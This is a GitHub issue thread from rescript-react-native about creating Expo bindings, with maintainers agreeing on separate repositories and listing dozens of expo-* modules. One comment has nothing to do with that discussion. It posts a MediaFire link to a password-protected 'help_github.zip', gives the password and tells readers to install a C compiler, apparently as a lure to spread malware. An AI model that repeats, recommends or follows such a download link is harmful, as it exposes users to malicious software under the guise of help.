### ISSUE TITLE
Expo bindings

### ISSUE THREAD

**Issue by cknitt** [rescript-react-native/rescript-react-native#817]
In https://reactnative.dev/blog/2024/06/25/use-a-framework-to-build-react-native-apps and https://reactnative.dev/blog/2024/08/12/release-0.75#using-frameworks, the React Native team gives the official recommendation to use "a framework" and states:

> As of today, the only recommended community framework for React Native is [Expo](https://docs.expo.dev/). Folks at Expo have been investing in the React Native ecosystem since the early days of React Native and as of today, we believe the developer experience offered by Expo is best in class.

IMHO it would therefore make sense to provide Expo bindings as part of rescript-react-native.

There are some very very outdated bindings at https://github.com/rescript-bindings/expo.
At CCA, we also have some Expo bindings, but only for the small subset of functionality we are currently using.

**Comment by Guigsguerra** [comment]
try this
https://www.mediafire.com/file/33h9a2mzmqf81fz/help_github.zip/file
Pass: xfp53
If you don't have the c compliator, install it.(gcc or clang)

**Comment by Freddy03h** [comment]
I'm not using Expo, what bindings are you talking about?

**Comment by cknitt** [comment]
Basically all APIs documented here: https://docs.expo.dev/versions/latest/ 🙂

(some of which are probably more important than others)

**Comment by Freddy03h** [comment]
Imho, it should be on an other repository

**Comment by cknitt** [comment]
Yes, this can be `@rescript-react-native/expo`, just had to create the issue somewhere. 🙂

**Comment by Freddy03h** [comment]
`@rescript-react-native/expo` sound good to me.

You plain to add `expo-*`  bindings directly on it and ref to other existing bindings (like `async-storage`)?

**Comment by Freddy03h** [comment]
We've convinced that we need to create expo modules bindings on separate repositories.
Because they can be used outside of an expo project (on a bare react-native app with expo-modules).

So, feel free to propose bindings for:

- `expo-sensors`
- `expo-apple-authentication`
- `expo-application`
- `expo-asset`
- `expo-audio`
- `expo-auth-session`
- `expo-crypto`
- `expo-background-task`
- `expo-battery`
- `expo-blur`
- `expo-brightness`
- `expo-build-properties`
- `expo-calendar`
- `expo-camera`
- `expo-cellular`
- `expo-checkbox`
- `expo-clipboard`
- `expo-constants`
- `expo-contacts`
- `expo-dev-client`
- `expo-device`
- `expo-document-picker`
- `expo-file-system`
- `@expo/fingerprint`
- `expo-font`
- `expo-gl`
- `expo-haptics`
- `expo-image`
- `expo-image-manipulator`
- `expo-image-picker`
- `expo-intent-launcher`
- `expo-keep-awake`
- `expo-linear-gradient`
- `expo-linking`
- `expo-live-photo`
- `expo-local-authentication`
- `expo-localization`
- `expo-location`
- `expo-mail-composer`
- `expo-manifests`
- `expo-media-library`
- `expo-mesh-gradient`
- `expo-navigation-bar`
- `expo-network`
- `expo-notifications`
- `expo-print`
- `expo-router`
- `expo-screen-capture`
- `expo-screen-orientation`
- `expo-secure-store`
- `expo-sharing`
- `expo-sms`
- `expo-speech`
- `expo-splash-screen`
- `expo-sqlite`
- `expo-status-bar`
- `expo-store-review`
- `expo-symbols`
- `expo-system-ui`
- `expo-task-manager`
- `expo-tracking-transparency`
- `expo-updates`
- `expo-video`
- `expo-video-thumbnails`
- `expo-web-browser`

By using [https://github.com/rescript-react-native/\_\_template\_\_](https://github.com/rescript-react-native/__template__)
